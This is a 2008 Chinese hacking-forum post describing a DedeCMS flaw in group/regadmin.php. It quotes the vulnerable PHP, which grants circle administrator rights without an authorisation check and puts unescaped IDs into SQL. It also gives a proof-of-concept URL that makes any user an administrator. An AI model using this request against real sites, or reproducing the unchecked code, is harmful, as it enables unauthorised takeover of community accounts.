‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[资料] dedecms漏洞—设置任意圈子管理员

tinzon

我系衰人?

三年级

Rank: 3Rank: 3Rank: 3

帖子
825 
精华
0 
威望
98 度 
金币
2305 枚 
性别
男 
来自
EvilOctal 
最后登录
2008-12-3 
1# 发表于 2008-8-28 19:25  只看该作者

dedecms漏洞—设置任意圈子管理员

文章作者:落叶纷飞
漏洞存在于group/regadmin.php文件,以下是漏洞代码:


复制内容到剪贴板
代码:

..................................................................................
if(!isset($do)) $do = '';
if($do=="ok"&&isset($uid)){
    $master = explode(",",$rs['ismaster']);
    $row = $db->GetOne("SELECT username FROM #@__group_user WHERE uid='$uid' AND gid='$id'");
    if(in_array($row['username'],$master)){
        $db->Close();
        ShowMsg("错误,".$row['username']."已经是管理员!","group.php?id=$id");
        exit();
    }
    array_push($master,$row['username']);
    $master = array_filter($master);
    $ismaster = implode(",",$master);
    $db->ExecuteNoneQuery("UPDATE #@__groups SET ismaster='{$ismaster}' WHERE groupid='$id'");
    $db->Close();
    $msg = "已将 {$username},设为管理员!";
    ShowMsg("{$msg}","group.php?id=$id");
    exit();
}
..................................................................................


首先搜索圈子,然后找到圈子的ID和你自己的ID,如圈子的ID为1,你自己的UID为2,则提交以下测试语句:

http://127.0.0.1/dg/group/regadmin.php?id=1&do=ok&uid=2

你就是这个圈子的管理员了~~

TOP

i9420

一年级

Rank: 1

帖子
179 
精华
0 
威望
4 度 
金币
384 枚 
最后登录
2008-11-27 
2# 发表于 2008-9-3 10:01  只看该作者
我的dede都懒的去修复他了。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题

Processed in 0.028206 second(s), 5 queries, Gzip enabled